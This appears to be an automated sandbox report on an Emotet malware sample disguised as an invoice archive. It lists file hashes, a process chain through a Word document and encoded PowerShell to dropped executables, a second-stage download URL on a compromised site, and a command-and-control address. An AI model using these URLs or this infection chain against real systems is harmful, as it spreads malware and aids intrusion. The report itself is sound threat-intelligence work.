Field | Value |
---|---|
File name | Factura _ HAS834685.7z |
Full analysis | https://app.any.run/tasks/a8127302-7d15-4e91-b478-d17fc479a57e |
Verdict | Malicious activity |
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date | March 21, 2019, 20:49:38 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/x-7z-compressed |
File info | 7-zip archive data, version 0.4 |
MD5 | E6C16FC121EE1CA12C7ABE3983552020 |
SHA1 | 3D7A73416BE409F02A84FEDAA127D1EEB0B2111E |
SHA256 | D4A0BCBF2508F697BD1568F22A12B4F8CC8BC1871ACBB7414FFC9922D0642A5A |
SSDEEP | 1536:RT0SR+oaBRySe4S8ZVCEzXq6dw3ZTzElswg1DKgBUX++SdBcLCq:V/RpaBRiEV4j32Vg1mOUX+xsmq |
Extension | Detected type | Confidence (%) |
---|---|---|
.7z | 7-Zip compressed archive (v0.4) | 57.1 |
.7z | 7-Zip compressed archive (gen) | 42.8 |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
688 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Factura _ HAS834685.7z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
888 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb688.42243\Factura _ HAS834685.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
2440 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Facture_Num_HAS834685.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
4060 | powershell -e <encoded command removed> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
304 | "C:\Users\admin\946.exe" | C:\Users\admin\946.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: Windows 8 Toast Notification; Exit code: 0; Version: 8,6,0,1000 |
2524 | --21281139 | C:\Users\admin\946.exe | | 946.exe | User: admin; Integrity Level: MEDIUM; Description: Windows 8 Toast Notification; Exit code: 0; Version: 8,6,0,1000 |
2556 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | | 946.exe | User: admin; Integrity Level: MEDIUM; Description: Windows 8 Toast Notification; Exit code: 0; Version: 8,6,0,1000 |
3152 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | | wabmetagen.exe | User: admin; Integrity Level: MEDIUM; Description: Windows 8 Toast Notification; Version: 8,6,0,1000 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR39FD.tmp.cvr | — | — | — |
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L18Y2XZAYA1875WJAIG8.temp | — | — | — |
2440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 2528D0B4F435A69E0B33284300361C1A | 1F15076BA8E04BF318B428E992F9F2B609465E382B6F85831574B2801C050B72 |
688 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb688.42243\Factura _ HAS834685.zip | compressed | 9BD31B86E55F83FC1C085289164F8788 | 0A2C18CD03E99010DCAF952EE5D38C94EC2D1F85D41F07E0505214549CC6EAD6 |
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
2440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Facture_Num_HAS834685.doc.LNK | lnk | 6E94608624B24F3CC8BC343BE3400CC0 | 542737B6B26C61EC3AB78F5B451C4875981F679A1E9EC89830F2CB7C897EA479 |
2440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 6C2E05CA89DC6F78E7D7A7BE2D231876 | FCE207C49BFAEBA635D616E1713F9A82B97C7B320892AFD7733B65ADA2D420F4 |
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF104b14.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
2440 | WINWORD.EXE | C:\Users\admin\Desktop\~$cture_Num_HAS834685.doc | pgc | 997B8D59A298D963D9BECF3352BB1861 | 6E7C2F2AB8452123ED817FE424DC129079DDE4827B59BF9F8F826024A17AB049 |
2524 | 946.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | 03072AD10291D3EE749CE3717511B35E | D8851D8EE62CE7646344D49AC54F4C7008C27795177DD05E0534F809EF9FC8B8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4060 | powershell.exe | GET | 200 | 192.99.175.156:80 | http://www.cbmagency.com/wp-content/GpXbVu/ | CA | executable | 352 Kb | suspicious |
3152 | wabmetagen.exe | POST | 200 | 189.250.145.98:443 | http://189.250.145.98:443/nsip/attrib/ringin/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3152 | wabmetagen.exe | 189.250.145.98:443 | — | Uninet S.A. de C.V. | MX | malicious |
4060 | powershell.exe | 192.99.175.156:80 | www.cbmagency.com | OVH SAS | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
www.cbmagency.com | 192.99.175.156 | suspicious |
PID | Process | Class | Message |
---|---|---|---|
4060 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4060 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4060 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3152 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |